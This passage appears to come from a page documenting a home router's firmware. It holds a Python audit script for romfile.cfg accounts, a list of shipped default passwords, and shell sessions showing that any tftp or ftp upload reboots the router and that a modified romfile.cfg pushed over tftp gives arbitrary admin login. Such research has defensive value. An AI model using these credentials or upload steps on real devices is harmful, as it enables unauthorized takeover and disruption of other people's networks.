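          display_mask="FF FF FF FF FF FF FF FF FF" />
</Account>
"""

# Username/password pairs documented on this page as shipped defaults.
KNOWN_DEFAULTS = {("admin", "c1@r0"), ("qwertyuiop", "1234567890"),
                  ("user3", "1234567890")}

def parse_mask(s):
    """'DF FF 6 ...' -> [0xDF, 0xFF, 0x6, ...]; single hex digits occur on the page."""
    return [int(tok, 16) for tok in s.split()]

def parse_accounts(text):
    """Return one dict per <EntryN ...> inside <Account> (whole text if no such block)."""
    block = re.search(r"<Account>(.*?)</Account>", text, re.S)
    scope = block.group(1) if block else text
    accounts = []
    for m in re.finditer(r"<(Entry\d+)\b([^>]*)>", scope):
        attrs = dict(re.findall(r'(\w+)="([^"]*)"', m.group(2)))
        accounts.append({
            "entry": m.group(1),
            "username": attrs.get("username", ""),
            "web_passwd": attrs.get("web_passwd", ""),
            "display_mask": parse_mask(attrs.get("display_mask", "")),
        })
    return accounts

def mask_exceeds(mask, reference):
    """True if mask sets any bit that reference does not (assumes set bit = menu shown)."""
    return any(m & ~r for m, r in zip(mask, reference))

def audit(text):
    """Return (entry, finding) pairs for the conditions described in this section."""
    accounts = parse_accounts(text)
    admin = next((a for a in accounts if a["entry"] == "Entry0"), None)
    findings = []
    for a in accounts:
        if (a["username"], a["web_passwd"]) in KNOWN_DEFAULTS:
            findings.append((a["entry"], "default credentials"))
        if len(a["web_passwd"]) < 8:
            findings.append((a["entry"], "short password"))
        if admin and a is not admin and mask_exceeds(a["display_mask"], admin["display_mask"]):
            findings.append((a["entry"], "display_mask grants more than admin"))
    return findings

if __name__ == "__main__":
    for entry, finding in audit(ROMFILE_SAMPLE):
        print(f"{entry}: {finding}")
```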
Vulnerabilities
Uploading any file of any size by tftp or ftp reboots the router!
$ echo "text" > file
$ tftp 192.168.1.1
tftp> put file
Sent 6 bytes in 13.9 seconds

$ ftp 192.168.1.1
220 bftpd 2.2 at 192.168.1.1 ready.
Name (192.168.1.1:xxx): admin
331 Password please.
Password: *****
230 User logged in.
ftp> put file
local: file remote: file
200 PORT 192.168.1.100:44443 OK
150 BINARY data connection established.
The firmware is illegal!!
6 bytes sent in 0.00 secs (1813.6 kB/s)
Uploading a modified romfile.cfg via tftp allows arbitrary login. The "Sent NNNNN bytes in NN seconds" message should appear; otherwise the romfile was not accepted (although the router still reboots).
<Account>
<Entry0 username="admin" web_passwd="stardust" console_passwd="stardust"
$ tftp 192.168.1.1
tftp> put romfile.cfg
Sent 29121 bytes in 13.5 seconds